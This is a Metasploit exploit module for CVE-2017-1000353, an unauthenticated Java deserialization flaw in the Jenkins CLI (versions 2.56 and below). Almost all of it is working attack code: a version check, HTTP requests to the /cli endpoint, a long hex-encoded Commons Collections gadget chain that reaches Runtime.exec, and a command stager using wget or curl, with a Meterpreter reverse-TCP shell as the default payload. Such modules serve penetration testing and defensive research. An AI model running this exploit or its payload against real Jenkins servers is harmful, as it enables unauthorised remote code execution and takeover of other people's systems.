Jenkins 2.56 CLI Deserialization / Code Execution

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
include Msf::Exploit::CmdStager  
prepend Exploit::Remote::AutoCheck  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'Jenkins CLI Deserialization',  
'Description' => %q{  
An unauthenticated Java object deserialization vulnerability exists  
in the CLI component for Jenkins versions `v2.56` and below.  
  
The `readFrom` method within the `Command` class in the Jenkins  
CLI remoting component deserializes objects received from clients without  
first checking / sanitizing the data. Because of this, a malicious serialized  
object contained within a serialized `SignedObject` can be sent to the Jenkins  
endpoint to achieve code execution on the target.  
},  
'License' => MSF_LICENSE,  
'Author' =>  
[  
'SSD', # PoC  
'Unknown', # Vulnerability discovery  
'Shelby Pace' # Metasploit module  
],  
'References' =>  
[  
[ 'URL', 'https://www.jenkins.io/security/advisory/2017-04-26/'],  
[ 'URL', 'https://ssd-disclosure.com/ssd-advisory-cloudbees-jenkins-unauthenticated-code-execution/'],  
[ 'CVE', '2017-1000353']  
],  
'Privileged' => false,  
'Platform' => 'linux',  
'Arch' => [ ARCH_X86, ARCH_X64 ],  
'Targets' =>  
[  
[  
'Linux',  
{  
'Platform' => 'linux',  
'CmdStagerFlavor' => [ 'wget', 'curl' ],  
'Arch' => [ ARCH_X86, ARCH_X64 ],  
'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }  
}  
]  
],  
'DisclosureDate' => '2017-04-26',  
'Notes' =>  
{  
'Stability' => [ CRASH_SAFE ],  
'Reliability' => [ UNRELIABLE_SESSION ],  
'SideEffects' => [ IOC_IN_LOGS ]  
},  
'DefaultTarget' => 0  
)  
)  
  
register_options(  
[  
Opt::RPORT(8080),  
OptString.new('TARGETURI', [ true, 'The base path to Jenkins', '/' ])  
]  
)  
end  
  
def check  
login_uri = normalize_uri(target_uri.path, 'login')  
login_res = send_request_cgi(  
'method' => 'GET',  
'uri' => login_uri  
)  
  
return Exploit::CheckCode::Unknown('Did not receive a response from the server') unless login_res  
  
/Jenkins\s+ver\.\s+(?<version>\d+(?:\.\d+)*)/ =~ login_res.body  
return Exploit::CheckCode::Safe('Version of Jenkins cannot be found.') unless version  
  
vers_no = Gem::Version.new(version)  
return Exploit::CheckCode::Appears("Jenkins version #{version} detected") if vers_no < Gem::Version.new('2.54')  
  
Exploit::CheckCode::Detected  
end  
  
def exploit  
print_status('Sending payload...')  
execute_cmdstager(noconcat: true)  
end  
  
def format_payload(payload_data)  
formatted_payload = '74'  
formatted_payload << payload_data.length.to_s(16).rjust(4, '0')  
formatted_payload << payload_data.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join  
end  
  
def execute_command(cmd, _opts = {})  
sess_uuid = SecureRandom.uuid  
sess_uri = normalize_uri(target_uri.path, 'cli')  
preamble = '<===[JENKINS REMOTING CAPACITY]===>rO0ABXNyABpodWRzb24ucmVtb3RpbmcuQ2FwYWJpbGl0eQAAAAAAAAABAgABSgAEbWFza3hwAAAAAAAAAH4='  
  
send_request_cgi(  
{  
'uri' => sess_uri,  
'method' => 'POST',  
'headers' =>  
{  
'Side' => 'download',  
'Session' => sess_uuid  
}  
},  
nil, false  
) # don't wait for response, and don't disconnect  
  
cmd = build_obj(cmd)  
send_request_cgi(  
{  
'uri' => sess_uri,  
'method' => 'POST',  
'data' => preamble + [ cmd ].pack('H*'),  
'headers' =>  
{  
'Side' => 'upload',  
'Session' => sess_uuid  
}  
}  
)  
sleep(2) # give buffer time between requests for processing  
end  
  
def build_obj(obj_data)  
payload_data = '00000000aced00057372002f6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e5265666572656e63654d61'  
payload_data << '701594ca03984908d7030000787077110000000000000001003f40000000000010737200286a6176612e7574696c2e636f6e63757272656e742'  
payload_data << 'e436f70794f6e577269746541727261795365744bbdd092901569d70200014c0002616c74002b4c6a6176612f7574696c2f636f6e6375727265'  
payload_data << '6e742f436f70794f6e577269746541727261794c6973743b7870737200296a6176612e7574696c2e636f6e63757272656e742e436f70794f6e5'  
payload_data << '77269746541727261794c697374785d9fd546ab90c303000078707704000000027372002a6a6176612e7574696c2e636f6e63757272656e742e'  
payload_data << '436f6e63757272656e74536b69704c697374536574dd985079bdcff15b0200014c00016d74002d4c6a6176612f7574696c2f636f6e637572726'  
payload_data << '56e742f436f6e63757272656e744e6176696761626c654d61703b78707372002a6a6176612e7574696c2e636f6e63757272656e742e436f6e63'  
payload_data << '757272656e74536b69704c6973744d6170884675ae061146a70300014c000a636f6d70617261746f727400164c6a6176612f7574696c2f436f6'  
payload_data << 'd70617261746f723b7870707372001a6a6176612e73656375726974792e5369676e65644f626a65637409ffbd682a3cd5ff0200035b0007636f'  
payload_data << '6e74656e747400025b425b00097369676e617475726571007e000e4c000c746865616c676f726974686d7400124c6a6176612f6c616e672f537'  
payload_data << '472696e673b7870757200025b42acf317f8060854e002000078700000050daced0005737200116a6176612e7574696c2e48617368536574ba44'  
payload_data << '859596b8b7340300007870770c000000023f40000000000001737200346f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6'  
payload_data << 'e732e6b657976616c75652e546965644d6170456e7472798aadd29b39c11fdb0200024c00036b65797400124c6a6176612f6c616e672f4f626a'  
payload_data << '6563743b4c00036d617074000f4c6a6176612f7574696c2f4d61703b7870740003666f6f7372002a6f72672e6170616368652e636f6d6d6f6e7'  
payload_data << '32e636f6c6c656374696f6e732e6d61702e4c617a794d61706ee594829e7910940300014c0007666163746f727974002c4c6f72672f61706163'  
payload_data << '68652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707372003a6f72672e6170616368652e636f6d6d6f6'  
payload_data << 'e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d6954'  
payload_data << '72616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d657'  
payload_data << '23b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d8'  
payload_data << '3418990200007870000000057372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436'  
payload_data << 'f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e7471007e00037870767200116a6176612e6c'  
payload_data << '616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e7'  
payload_data << '32e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f'  
payload_data << '6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d547'  
payload_data << '97065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c'  
payload_data << '02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a9902000078700'  
payload_data << '00000007400096765744d6574686f647571007e001b00000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078'  
payload_data << '707671007e001b7371007e00137571007e001800000002707571007e001800000000740006696e766f6b657571007e001b00000002767200106'  
payload_data << 'a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00187371007e0013'  
payload_data << '75720013'  
payload_data << '5b4c6a6176612e6c616e672e537472696e673b'  
payload_data << 'add256e7e91d7b47'  
payload_data << '020000'  
payload_data << '7870'  
payload_data << '00000001'  
  
obj_data = format_payload(obj_data)  
payload_data << obj_data  
  
payload_data << '740004'  
payload_data << '65786563' # exec  
payload_data << '7571007e0'  
payload_data << '01b0000000171007e00207371007e000f737200116a6176612e6c616e672e496e746567657212e2a0a4f781873802000149000576616c756578'  
payload_data << '7200106a6176612e6c616e672e4e756d62657286ac951d0b94e08b020000787000000001737200116a6176612e7574696c2e486173684d61700'  
payload_data << '507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f40000000000000770800000010000000007878'  
payload_data << '787571007e00110000002f302d02147ed1e347cfebac075517d658628ac128211d8895021500945aaa3b69fb24194cdf22bcee9fc9c5e317266'  
  
# This index is the length of the serialized  
# object that belongs to the SignedObject  
start_arr = payload_data.index('050daced')  
end_arr = payload_data.index('787571007e')  
new_arr_len = ((end_arr + 2) / 2) - ((start_arr + 4) / 2)  
payload_data[start_arr, 4] = new_arr_len.to_s(16).rjust(4, '0')  
  
payload_data << '0740003445341737200116a6176612e6c616e672e426f6f6c65616ecd207280d59cfaee0200015a000576616c75657870017078737200316f72'  
payload_data << '672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e7365742e4c6973744f726465726564536574fcd39ef6fa1ced5302000'  
payload_data << '14c00087365744f726465727400104c6a6176612f7574696c2f4c6973743b787200436f72672e6170616368652e636f6d6d6f6e732e636f6c6c'  
payload_data << '656374696f6e732e7365742e416273747261637453657269616c697a61626c655365744465636f7261746f72110ff46b96170e1b03000078707'  
payload_data << '37200156e65742e73662e6a736f6e2e4a534f4e41727261795d01546f5c2872d20200025a000e657870616e64456c656d656e74734c0008656c'  
payload_data << '656d656e747371007e0018787200186e65742e73662e6a736f6e2e41627374726163744a534f4ee88a13f4f69b3f82020000787000737200136'  
payload_data << 'a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a65787000000001770400000001740004617364667878'  
payload_data << '7371007e001e00000000770400000000787871007e00207371007e00027371007e000577040000000271007e001a71007e00097871007e00207078'  
end  
end  
`